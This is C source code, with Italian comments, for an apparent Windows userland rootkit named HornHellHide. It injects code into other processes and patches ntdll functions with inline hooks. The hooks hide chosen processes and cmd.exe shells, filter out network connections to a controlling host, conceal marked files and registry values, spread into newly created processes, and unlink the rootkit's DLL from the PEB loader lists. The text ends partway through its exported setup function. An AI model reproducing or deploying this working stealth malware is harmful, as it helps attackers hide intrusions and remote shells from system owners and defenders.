#include "HornHellHide.h"
#include "OpCodeAlign.h"
#define  PROCESSFILE "explorer.exe"
#define REDIR_SIZE 7

extern DWORD ex_ManagerIP;

typedef BOOL (WINAPI *CREATEPROCESS)(LPCTSTR,LPTSTR,LPSECURITY_ATTRIBUTES,LPSECURITY_ATTRIBUTES,BOOL,DWORD,LPVOID,LPCTSTR,LPSTARTUPINFO,LPPROCESS_INFORMATION);
typedef DWORD (WINAPI *NTQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS,PVOID,ULONG,PULONG);
typedef DWORD (WINAPI *NTQUERYDIRECTORYFILE)(HANDLE, HANDLE, PVOID, PVOID, PVOID, PVOID, ULONG, DWORD, BOOLEAN, CHAR *, BOOLEAN);
typedef VOID (WINAPI *DOHIDE)(HANDLE,DWORD, DWORD,CHAR *);
typedef HMODULE (WINAPI *LOADLIBRARY) (CHAR *);
typedef BOOL (WINAPI *FREELIBRARY)(HMODULE);
typedef FARPROC (WINAPI *GETPROCADDRESS) (HINSTANCE, DWORD);
typedef DWORD (WINAPI *RESUMETHREAD) (HANDLE);

extern char *upstr(char *);

//----------------- Strutture per file hiding e registry -----------------------
#define FileDirectoryInformation 1
#define FileFullDirectoryInformation 2
#define FileBothDirectoryInformation 3
#define FileNamesInformation 12

typedef struct _FILE_DIRECTORY_INFORMATION { 
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize; 
        ULONG FileAttributes;
        ULONG FileNameLength;
        WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;

typedef struct _FILE_FULL_DIRECTORY_INFORMATION {
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize;
        ULONG FileAttributes;
        ULONG FileNameLength;
        ULONG EaInformationLength;
        WCHAR FileName[1];
} FILE_FULL_DIRECTORY_INFORMATION, *PFILE_FULL_DIRECTORY_INFORMATION;

typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { 
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize;
        ULONG FileAttributes;
        ULONG FileNameLength;
        ULONG EaInformationLength;
        UCHAR AlternateNameLength;
        WCHAR AlternateName[12];
        WCHAR FileName[1];
} FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION; 


typedef struct _FILE_NAMES_INFORMATION {
        ULONG NextEntryOffset;
        ULONG Unknown;
        ULONG FileNameLength;
        WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;


typedef struct _KEY_VALUE_BASIC_INFORMATION {
	ULONG TitleIndex;
	ULONG Type;
	ULONG NameLength;
	WCHAR Name[1];
} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;

typedef struct _KEY_VALUE_FULL_INFORMATION {
	ULONG TitleIndex;
	ULONG Type;
	ULONG DataOffset;
	ULONG DataLentgh;
	ULONG NameLength;
	WCHAR Name[1];
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;

//-------------------------------------------

typedef struct {
	void *OriginalAPI;  
	// Poi ognuno ci sbatte qui quello che vuole
} INJDATA_WRAP, *PINJDATA_WRAP;

// Parametri da passare al THREAD di hiding
typedef struct {
	DWORD Pid;
	char *dll_name;
} ThreadParams;



#define MAX_DLL_NAME 16
#define MAX_FUNC_NAME 64
typedef struct {
	INJDATA_WRAP *Data;
	DWORD *WrapFunc;
	char DLL[MAX_DLL_NAME];
	char FUNC[MAX_FUNC_NAME];
	unsigned char *ImageBase;
	HANDLE hProc;
} INJDATA_HOOK, *PINJDATA_HOOK;

typedef struct {
	DWORD Image_Base;
	DWORD Loaded_Head;
	HANDLE hProc;
} INJDATA_PEB, *PINJDATA_PEB;


typedef struct {
  WORD Hint;
  char Name1[MAX_FUNC_NAME];
} MY_IMAGE_IMPORT_BY_NAME;


typedef struct { 
  char *OriginalFirstThunk;
  DWORD TimeDateStamp;
  DWORD ForwarderChain;
  char *Name1;
  char *FirstThunk;
} MY_IMAGE_IMPORT_DESCRIPTOR;

typedef struct  {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    PDWORD  *AddressOfFunctions;
    PDWORD  *AddressOfNames;
    PWORD   *AddressOfNameOrdinals;
} MY_IMAGE_EXPORT_DESCRIPTOR;


typedef struct {
	DWORD InLoadNext;
	DWORD InLoadPrev;
	DWORD InMemNext;
	DWORD InMemPrev;
	DWORD InInitNext;
	DWORD InInitPrev;
	DWORD ImageBase;
} MY_LIST_ENTRY, *PMY_LIST_ENTRY;

typedef struct _MIB_TCPROW 
{  DWORD dwState;  
   DWORD dwLocalAddr;  
   DWORD dwLocalPort;  
   DWORD dwRemoteAddr;  
   DWORD dwRemotePort;
} MIB_TCPROW, *PMIB_TCPROW;

typedef struct _MIB_TCPROW_EX
{
      DWORD dwState; 
      DWORD dwLocalAddr;
      DWORD dwLocalPort;
      DWORD dwRemoteAddr;
      DWORD dwRemotePort;
      DWORD dwProcessId;
} MIB_TCPROW_EX, *PMIB_TCPROW_EX;

typedef struct _IO_STATUS_BLOCK {
	DWORD dummy;
    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;






//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////        WRAPPERS          //////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////


typedef struct {
	char Wrapped_Code[24];
	int PID1;
} NTQUERYSYSTEMINFORMATION_WRAP, *PNTQUERYSYSTEMINFORMATION_WRAP;


typedef struct {
	char Wrapped_Code[24];
	int PID_Explorer;
	int Remote_Host;
	LOADLIBRARY m_LoadLibrary;
	FREELIBRARY m_FreeLibrary;
	GETPROCADDRESS m_GetProcAddress;
	char LibName[256];
} NTCREATEPROCESSRW_WRAP, *PNTCREATEPROCESSRW_WRAP;

typedef struct {
	char Wrapped_Code[24];
	int PID1;
	int Remote_Host;
} NTDEVICEIOCONTROLFILE_WRAP, *PNTDEVICEIOCONTROLFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTQUERYDIRECTORYFILE_WRAP, *PNTQUERYDIRECTORYFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTENUMERATEVALUEKEY_WRAP, *PNTENUMERATEVALUEKEY_WRAP;

/*
typedef struct {
	NTQUERYDIRECTORYFILE WQueryDirectoryFile;
} NTQUERYDIRECTORYFILEEXPLORER_WRAP, *PNTQUERYDIRECTORYFILEEXPLORER_WRAP;
*/

static DWORD WINAPI WrapNtDeviceIoControlFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  PIO_STATUS_BLOCK IoStatusBlock,
  ULONG IoControlCode,
  char * InputBuffer,
  ULONG InputBufferLength,
  PVOID OutputBuffer,
  ULONG OutputBufferLength)
{
	BOOL ret_code;
	NTDEVICEIOCONTROLFILE_WRAP *pData;
	BOOL ext, inter = FALSE;


	if(	IoControlCode  == 0x000120003 &&
		InputBuffer && OutputBuffer &&  OutputBufferLength > 0 && InputBufferLength > 0 &&
		InputBuffer[0] == 0x00 && InputBuffer[1] == 0x04 && InputBuffer[17] == 0x01)
	{
			inter = TRUE;
			if (InputBuffer[16] == 0x2)
				ext = TRUE;
			else
			{
				ext = FALSE;
				//InputBuffer[16] = 0x2;
			}
				
	}
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[OutputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[OutputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[IoControlCode]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[IoStatusBlock]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX


	};
	
	if(inter)
	{
		DWORD len = IoStatusBlock->Information;	
		//MIB_TCPROW_EX *Src;
		MIB_TCPROW_EX *row_ex;
		MIB_TCPROW *row;
		char *Src;
		char *Dst;
		
		//Src = (MIB_TCPROW_EX *)OutputBuffer;
		Src = (char *)OutputBuffer;
		Dst = (char *)OutputBuffer;
		IoStatusBlock->Information = 0;

		while (len > 0)
		{
			if(ext)
			{	
				row_ex = (MIB_TCPROW_EX *)Src;
				if (row_ex->dwProcessId != pData->PID1)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW_EX));
					Dst += sizeof(MIB_TCPROW_EX);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW_EX);
				}
				Src += sizeof(MIB_TCPROW_EX);
				len -= sizeof(MIB_TCPROW_EX);
			}
			else
			{
				row = (MIB_TCPROW *)Src;
				if(row->dwRemoteAddr != pData->Remote_Host)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW));
					Dst += sizeof(MIB_TCPROW);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW);
				}
				Src += sizeof(MIB_TCPROW);
				len -= sizeof(MIB_TCPROW);
			}
		}
	}

    return ret_code;
}


static DWORD WINAPI WrapNtEnumerateValueKey(
  DWORD arg1,
  DWORD RIndex,
  DWORD InformationClass,
  DWORD *KeyValueInformation,
  DWORD InformationLen,
  DWORD *ResultLen)
{
	DWORD ret_code;
	NTENUMERATEVALUEKEY_WRAP *pData;
	char *ValueName;
	DWORD TIndex=0, TFound=0;


RegKeyRestart:
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyValueInformation]
	 PUSH EAX
	 MOV  EAX, 0
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	// If success. RIndex e' quello richiesto.
	if ((*ResultLen)>0 && ret_code==0)
	{
		ValueName = (char *)(((KEY_VALUE_BASIC_INFORMATION *)KeyValueInformation)->Name);

		if (ValueName[0]!='*' || ValueName[2]!='_')
			TFound++;

		if (TFound < (RIndex+1))
		{
			TIndex++;
			goto RegKeyRestart;
		}
	}

__asm {
	 MOV ESI, DWORD PTR SS:[pData]

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyValueInformation]
	 PUSH EAX
	 MOV  EAX, DWORD PTR SS:[InformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	return ret_code;
}



static DWORD WINAPI WrapNtQueryDirectoryFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  char *FileInformation,
  ULONG FileInformationLength,
  DWORD FileInformationClass,
  DWORD arg9,
  DWORD arg10,
  DWORD arg11)
{
	DWORD ret_code, b_len;
	DWORD *old_b_len = NULL;
	NTQUERYDIRECTORYFILE_WRAP *pData;
	char *Src;
	char *file_name;
	BOOLEAN found = FALSE;

#define NO_SUCH_FILE 0xC000000F

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg11]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg10]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX

	 MOV  EAX,DWORD PTR SS:[FileInformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[FileInformationLength]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[FileInformation]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};
	
	if(ret_code != 0 || FileInformationLength <= 0)
	   return ret_code;
		
	Src = (char *)FileInformation;

	if (FileInformationClass != FileDirectoryInformation &&
		FileInformationClass != FileFullDirectoryInformation &&
		FileInformationClass != FileBothDirectoryInformation &&
		FileInformationClass != FileNamesInformation)
		return ret_code;

	do {
		// Tanto per tutte le strutture e' sempre la prima entry
		b_len = ((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;


		if (FileInformationClass == FileDirectoryInformation) 
			file_name = (char *)(((FILE_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileFullDirectoryInformation) 
			file_name = (char *)(((FILE_FULL_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileBothDirectoryInformation) 
			file_name = (char *)(((FILE_BOTH_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileNamesInformation) 
			file_name = (char *)(((FILE_NAMES_INFORMATION *)Src)->FileName);

		// Dobbiamo cancellare questa entry
		if (file_name[0]=='_' && file_name[2]=='(')
		{
			if (old_b_len) 
			{
				*old_b_len += b_len;
				
				// E' l'ultima entry
				if (b_len == 0)
					*old_b_len = 0;
			}
			else // E' la prima entry
			{
				FileInformationLength -= b_len;
				if (FileInformationLength >0)
				{
					memcpy(Src, Src + b_len, FileInformationLength); 
					Src -= b_len; // Per compensare il + di dopo 
				}
			}
		}
		else 
		{
			found = TRUE;
			old_b_len = &((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;
		}

		Src += b_len;
	} while(b_len!=0);

	if (!found)
		return NO_SUCH_FILE;

    return ret_code;
}


static DWORD WINAPI WrapNtCreateProcess(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;
	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host ,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}

static DWORD WINAPI WrapNtCreateProcessEx(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8,
  DWORD arg9)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;

	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}


static DWORD WINAPI WrapNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
												 PVOID SystemInformation,
												 LONG SystemInformationLength,
												 PULONG ReturnLength)
{
	DWORD PID1, PID_CMD, ret_code;
	NTQUERYSYSTEMINFORMATION_WRAP *pData;
	SYSTEM_PROCESS_INFORMATION *Spi;
	SYSTEM_PROCESS_INFORMATION *Old_Spi;
	char *Spi_Offs;
	int LocalRetLen;

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV EDX,DWORD PTR SS:[SystemInformationClass]
	 MOV ECX,DWORD PTR SS:[SystemInformation]
	 MOV EDI,DWORD PTR SS:[SystemInformationLength]

	 // Chiediamo comunque la lunghezza della struttura
	 LEA EAX, LocalRetLen
	 //MOV EAX,DWORD PTR SS:[ReturnLength]

	 PUSH EAX			// pusha i parametri
	 PUSH EDI
	 PUSH ECX
	 PUSH EDX

	 CALL ESI	//Chiama Wrapper
	 MOV DWORD PTR SS:[ret_code], EAX
	 
	};

	if (ret_code >= 0x40000000) {
		if (ReturnLength)
			*ReturnLength = LocalRetLen;
		return ret_code;
	}

	PID1 = pData->PID1;

	// Fake PID
	PID_CMD = 0x69696969;
	int TempLen = 0;

	if (SystemInformationClass==SystemProcessInformation && SystemInformation!=NULL && SystemInformationLength>0)
	{
		Spi_Offs = (char *)SystemInformation;

		do  
		{
			if ( TempLen > (LocalRetLen - sizeof(SYSTEM_PROCESS_INFORMATION)) || (TempLen > (SystemInformationLength -  sizeof(SYSTEM_PROCESS_INFORMATION))))
				break;
			
			Spi = (SYSTEM_PROCESS_INFORMATION *)Spi_Offs;
			
			//if(Spi->NextEntryOffset == 0) 
			//	break;

			if (Spi->ProcessName.Length > 0 && Spi->ProcessName.Buffer &&  
				( (*((DWORD *)Spi->ProcessName.Buffer) == 0x004D0043 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0044) ||
				  (*((DWORD *)Spi->ProcessName.Buffer) == 0x006D0063 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0064)) )

				if (PID_CMD == 0x69696969) // Nasconde il primo CMD che trova e i suoi figli
					PID_CMD = Spi->UniqueProcessId;

			// Cerca IExplorer, CMD e tutti i suoi figli diretti
			if (PID1 == Spi->UniqueProcessId || PID_CMD == Spi->UniqueProcessId || PID_CMD == Spi->ParentProcessId) {
				// Unlinka la struttura del nostro processo
				Old_Spi->NextEntryOffset += Spi->NextEntryOffset;

				// Se e' l'ultimo processo, termina la lista
				if (Spi->NextEntryOffset == 0)
					Old_Spi->NextEntryOffset = 0;

			}
			else
				Old_Spi = Spi;

		
			Spi_Offs += Spi->NextEntryOffset;
			TempLen	 += Spi->NextEntryOffset;

		} while(Spi->NextEntryOffset);

	}

	if (ReturnLength)
		*ReturnLength = LocalRetLen;
	
	return ret_code;
}




//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////

BOOL GetPEB (INJDATA_PEB *pData)
{
	DWORD Image_Base;
	DWORD Loaded_Head;
	char  *pPEB;
	DWORD bytesRead;
	char  *Ldr;


	pData->Image_Base = 0;
	pData->Loaded_Head = 0;

	__asm {

		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	ReadProcessMemory(pData->hProc, pPEB, &Image_Base, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;
	
	pData->Image_Base = Image_Base;

	pPEB += 4;

	ReadProcessMemory(pData->hProc, pPEB, &Ldr, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;

	Ldr += 0x1C;

	ReadProcessMemory(pData->hProc, Ldr, &Loaded_Head, 4, &bytesRead);
	if (bytesRead==4)
		pData->Loaded_Head = Loaded_Head;

	return TRUE;
}


MY_LIST_ENTRY *GetMyPEB ()
{
	DWORD Loaded_Head;
	DWORD **pPEB;
	DWORD *Ldr;

	__asm {
		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	Ldr = *(pPEB + 1);
	Loaded_Head = *(Ldr + 3);

	return (MY_LIST_ENTRY *)Loaded_Head;
}

// Cerca hModule nella lista delle dipendenze e lo elimina
void Remove_Depends(DWORD hModule)
{
	MY_LIST_ENTRY *Depends_List, *List_Head;
	MY_LIST_ENTRY *prev, *next;

	Depends_List = List_Head = GetMyPEB();
	do {
		// Ha trovato il modulo e lo cancella dalle 3 liste
		if (Depends_List->ImageBase == hModule) {

			prev = (MY_LIST_ENTRY *) Depends_List->InLoadPrev;
			next = (MY_LIST_ENTRY *) Depends_List->InLoadNext;
			prev->InLoadNext = (DWORD)next;
			next->InLoadPrev = (DWORD)prev;

			if (Depends_List->InMemPrev && Depends_List->InMemNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InMemPrev - 8);
				next = (MY_LIST_ENTRY *) (Depends_List->InMemNext - 8);
				prev->InMemNext = ((DWORD)next) + 8;
				next->InMemPrev = ((DWORD)prev) + 8;
			}

			if (Depends_List->InInitPrev && Depends_List->InInitNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InInitPrev - 16);
				next = (MY_LIST_ENTRY *) (Depends_List->InInitNext - 16);
				prev->InInitNext = ((DWORD)next) + 16;
				next->InInitPrev = ((DWORD)prev) + 16;
			}

			break;			
		}
		Depends_List = (MY_LIST_ENTRY *)Depends_List->InLoadNext;
	} while(List_Head != Depends_List); 
}

void Inject_Rewrite(HANDLE hProcess, void *CODE_WRAP, DWORD CODE_LEN, void *DATA_WRAP, DWORD DATA_LEN, char *FUNC_NAME)
{
	char		 *pDataRemote_Wrap;
	DWORD		 *pCodeRemote_Wrap;
	DWORD dwNumBytesXferred = 0;
	char tmpAPIbuff[32];

	// Usati per localizzare il puntatore alla zona dati della funzione wrapper
	char *Find_Global;
	char ByteGlobal;

	//------------------------------------------------------

	// Inietta il WRAPPER - DATI
	// XXXTACCONI
	//pDataRemote_Wrap = (char *) VirtualAllocEx( hProcess, 0, DATA_LEN, MEM_COMMIT, PAGE_READWRITE );
	pDataRemote_Wrap = (char *) VirtualAllocEx( hProcess, 0, DATA_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	memcpy(DATA_WRAP, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x90\x90\x90\x90", 24);
	if (!pDataRemote_Wrap) return;
	WriteProcessMemory( hProcess, pDataRemote_Wrap, DATA_WRAP, DATA_LEN, &dwNumBytesXferred );

	// Inietta il WRAPPER - CODICE
	pCodeRemote_Wrap = (PDWORD) VirtualAllocEx( hProcess, 0, CODE_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE );		
	if (!pCodeRemote_Wrap) return;
	WriteProcessMemory( hProcess, pCodeRemote_Wrap, CODE_WRAP, CODE_LEN, &dwNumBytesXferred );

	// Modifica l'indirizzo dei dati "globali" della funzione wrap
	Find_Global = (char *)pCodeRemote_Wrap;

	// XXX - Sovrascrive l'offset
	do {
		Find_Global++;
		ReadProcessMemory( hProcess, Find_Global, &ByteGlobal, 1, &dwNumBytesXferred);
	} while (ByteGlobal!=0x69);

	WriteProcessMemory( hProcess, Find_Global, &pDataRemote_Wrap, 4, &dwNumBytesXferred );

	//--------------------------------------------------------
	HMODULE hMod = LoadLibrary("ntdll.dll");
	char *Original_API = (char *)GetProcAddress(hMod, FUNC_NAME);
	
	ReadProcessMemory( hProcess, Original_API, tmpAPIbuff, 32, &dwNumBytesXferred);

	DWORD code_len = 0;
	char JMP_Code[16];


	while (code_len < REDIR_SIZE)
		code_len += OpCodeAlign(tmpAPIbuff + code_len);

	if (code_len > 15 || Original_API==NULL)
		return;

	// Prepariamo il JMP CODE
	ReadProcessMemory( hProcess, Original_API, JMP_Code, code_len, &dwNumBytesXferred);
	if (dwNumBytesXferred != code_len)
		return;

	WriteProcessMemory( hProcess, pDataRemote_Wrap, JMP_Code, code_len, &dwNumBytesXferred);

	//JMP_Code[0]='\xE9';
	//*((DWORD *)(&JMP_Code[1])) = (DWORD)((DWORD)pCodeRemote_Wrap - (DWORD)Original_API - 5);
	
	JMP_Code[0]='\xB8';
	*((DWORD *)(&JMP_Code[1])) = (DWORD)(pCodeRemote_Wrap);
	JMP_Code[5]='\xFF';
	JMP_Code[6]='\xE0';

	WriteProcessMemory( hProcess, Original_API, JMP_Code, REDIR_SIZE, &dwNumBytesXferred);

	Original_API = (char *)((DWORD)Original_API + code_len - ((DWORD)pDataRemote_Wrap + 20));
	WriteProcessMemory( hProcess, pDataRemote_Wrap + 16, &Original_API, 4, &dwNumBytesXferred);

}






// FUNZIONE ESPORTATA --------------------------------------------------------------------
void doWrapping(HANDLE hProcess, int PID, int Remote_Host, char *HHDLL_Name)
{
	NTQUERYSYSTEMINFORMATION_WRAP DataNtQuerySystemInformation;
	NTQUERYDIRECTORYFILE_WRAP DataWrap_NtQueryDirectoryFile;
	NTCREATEPROCESSRW_WRAP DataWrap_CreateProcess;
	NTDEVICEIOCONTROLFILE_WRAP DataWrap_DeviceIoControlFile;
	NTENUMERATEVALUEKEY_WRAP DataWrap_NtEnumerateValueKey;

	HMODULE hMod = LoadLibrary("kernel32.dll");
	DataWrap_CreateProcess.PID_Explorer = PID;
	DataWrap_CreateProcess.Remote_Host = Remote_Host;
	DataWrap_CreateProcess.m_LoadLibrary =(LOADLIBRARY) GetProcAddress( hMod, "LoadLibraryA" );
	DataWrap_CreateProcess.m_FreeLibrary =(FREELIBRARY) GetProcAddress( hMod, "FreeLibrary" );
	DataWrap_CreateProcess.m_GetProcAddress =(GETPROCADDRESS) GetProcAddress( hMod, "GetProcAddress");
	strcpy(DataWrap_CreateProcess.LibName, HHDLL_Name);
	
	Inject_Rewrite(hProcess, &WrapNtCreateProcess, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcess");
	Inject_Rewrite(hProcess, &WrapNtCreateProcessEx, 1024, &DataWrap_CreateProcess, sizeof(NTCREATEPROCESSRW_WRAP), "NtCreateProcessEx");

	DataNtQuerySystemInformation.PID1 = PID;
	Inject_Rewrite(hProcess, &WrapNtQuerySystemInformation, 1024, &DataNtQuerySystemInformation, sizeof(NTQUERYSYSTEMINFORMATION_WRAP), "NtQuerySystemInformation");

	DataWrap_DeviceIoControlFile.PID1 = PID;
	DataWrap_DeviceIoControlFile.Remote_Host = Remote_Host;
	Inject_Rewrite(hProcess, &WrapNtDeviceIoControlFile, 1024, &DataWrap_DeviceIoControlFile, sizeof(NTDEVICEIOCONTROLFILE_WRAP), "NtDeviceIoControlFile");

